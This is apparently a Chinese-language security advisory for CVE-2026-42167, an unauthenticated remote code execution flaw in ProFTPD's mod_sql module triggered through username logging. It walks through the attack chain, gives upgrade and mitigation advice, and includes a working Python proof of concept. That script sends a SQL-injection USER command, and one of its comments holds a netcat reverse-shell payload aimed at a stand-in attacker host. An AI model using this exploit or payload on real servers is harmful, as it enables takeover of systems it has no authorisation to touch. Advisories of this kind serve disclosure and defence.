CVE-2026-42167 ProFTPD远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-42167

漏洞类型

远程代码执行

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ProFTPD

漏洞概述

ProFTPD是一款广泛使用的FTP服务器软件。在其1.3.9a版本之前的mod_sql模块中存在一个严重的远程代码执行漏洞。该漏洞允许未经身份验证的攻击者通过精心构造的用户名利用日志记录机制中的扩展功能（如%U），结合SQL后端允许的命令执行功能（如PostgreSQL的COPY TO PROGRAM），从而在目标服务器上执行任意系统命令。由于无需用户交互且攻击复杂度低，该漏洞对服务器安全构成极高威胁。

技术细节

该漏洞的核心在于ProFTPD的mod_sql模块处理日志记录与SQL后端交互时的逻辑缺陷。当管理员配置了记录包含%U（用户名）扩展的日志格式时，服务器会将用户提供的输入直接传递给SQL后端进行处理。攻击者无需通过FTP认证，仅需在建立连接时发送特制的恶意用户名。如果后端数据库支持特定的命令执行功能（例如PostgreSQL的COPY ... TO PROGRAM ...），攻击者便可以通过注入恶意的SQL语句，利用日志记录过程中的字符串拼接或解析逻辑，触发数据库执行操作系统命令。由于ProFTPD通常以高权限运行，且SQL后端操作可能继承这些权限，攻击者成功利用此漏洞即可获得目标服务器的完全控制权，实现远程代码执行。

攻击链分析

STEP 1

侦察

攻击者扫描目标端口，识别出运行的是ProFTPD服务器，并确认其版本低于1.3.9a。

STEP 2

漏洞利用

攻击者无需认证，直接向FTP端口发送特制的USER命令，其中包含恶意构造的用户名（SQL注入载荷）。

STEP 3

命令注入

服务器在记录日志时，解析%U扩展字符，将恶意用户名传递给SQL后端（如PostgreSQL）。

STEP 4

代码执行

SQL后端解析注入的命令（如COPY TO PROGRAM），在系统层面执行攻击者指定的任意代码。

STEP 5

获取权限

攻击者获得服务器Shell访问权限，可能进一步提权控制整个系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
PoC for CVE-2026-42167
Demonstrates sending a malicious username to trigger RCE via SQL backend logging expansion.
Target: ProFTPD < 1.3.9a with mod_sql and logging enabled (e.g. %U expansion).
"""
import socket
import sys

def send_exploit(target_ip, target_port, payload):
    print(f"[*] Connecting to {target_ip}:{target_port}...")
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))
        
        # Receive banner
        banner = s.recv(1024).decode()
        print(f"[+] Banner: {banner.strip()}")
        
        # Send malicious USER command
        # The payload attempts to inject SQL command execution (e.g., COPY TO PROGRAM)
        # This works if the SQL backend is PostgreSQL and the log format expands %U
        print(f"[*] Sending payload: {payload}")
        s.send(f"USER {payload}\r\n".encode())
        
        response = s.recv(1024).decode()
        print(f"[+] Response: {response.strip()}")
        
        s.close()
        print("[*] Exploit packet sent. Check your listener for shell connection.")
        
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Example payload for PostgreSQL: '; COPY (SELECT '') TO PROGRAM 'nc -e /bin/sh ATTACKER_IP 4444'; --
    # Note: The exact payload depends on the specific SQL backend configuration.
    TARGET = "127.0.0.1"
    PORT = 21
    PAYLOAD = "'; COPY (SELECT '') TO PROGRAM 'touch /tmp/pwned'; --"
    
    if len(sys.argv) > 1:
        TARGET = sys.argv[1]
    if len(sys.argv) > 2:
        PORT = int(sys.argv[2])
        
    send_exploit(TARGET, PORT, PAYLOAD)

影响范围

ProFTPD < 1.3.9a

防御指南

临时缓解措施

建议立即升级ProFTPD至最新版本以修复此漏洞。若无法立即升级，应作为临时缓解措施：禁用mod_sql模块或严格配置日志格式，移除对用户名的扩展记录；同时确保连接数据库的账户仅具备应用程序所需的最小权限，严禁数据库拥有执行系统命令的权限。